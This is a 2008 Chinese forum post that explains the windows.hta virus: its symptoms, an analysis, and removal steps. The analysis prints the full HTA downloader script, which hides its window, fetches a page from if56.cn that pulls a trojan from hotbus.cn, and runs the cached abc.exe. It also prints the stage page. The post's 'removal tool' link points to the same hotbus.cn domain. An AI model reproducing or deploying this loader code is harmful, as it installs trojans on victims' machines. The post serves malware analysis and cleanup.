windows.hta病毒清除方法及windows.hta专杀下载

phper · 发表于 2008-4-14 01:15:24

windows.hta病毒中毒症状：
启动项里出现了windows.hta，杀毒软件报告他从WWW.IF56.COM下载木马
windows.hta病毒分析：
最近几天接连遇见HTA（HTML Application的缩写，HTML应用程序）编写的病毒下载器，主要是以下这两个： C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta 以Windows.hta为例，看下代码： ============================================================= <html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html> ============================================================= 程序随机自启动，成功执行后连接到地址http://www.if56.cn/lo/downmm.html下载木马，downmm.html代码如下： ============================================================= <html> <title> downmm </title> <script src="http://www.hotbus.cn/it/200706/abc.exe"></script> <body> start download............................. </body> </html> ============================================================= 这个abc.exe经过avast扫描，发现木马病毒：WIN32:Nilage-AI windows.hta病毒清除办法：
<DIV style="FONT-SIZE: 12px">第一：开始－程序－启动－删除那个文件 第二：删除历史文件，IE的COOKIES,以及脱机网页 第三：使用诺顿杀毒软件可以查杀的。</DIV>
<DIV style="FONT-SIZE: 12px"> </DIV>
windows.hta病毒专杀工具下载：<A href="http://www.hotbus.cn/it/200706/2266.html">/it/200706/2266.html</A>

账号		自动登录	找回密码
密码			注册账户

windows.hta病毒清除方法及windows.hta专杀下载

相关帖子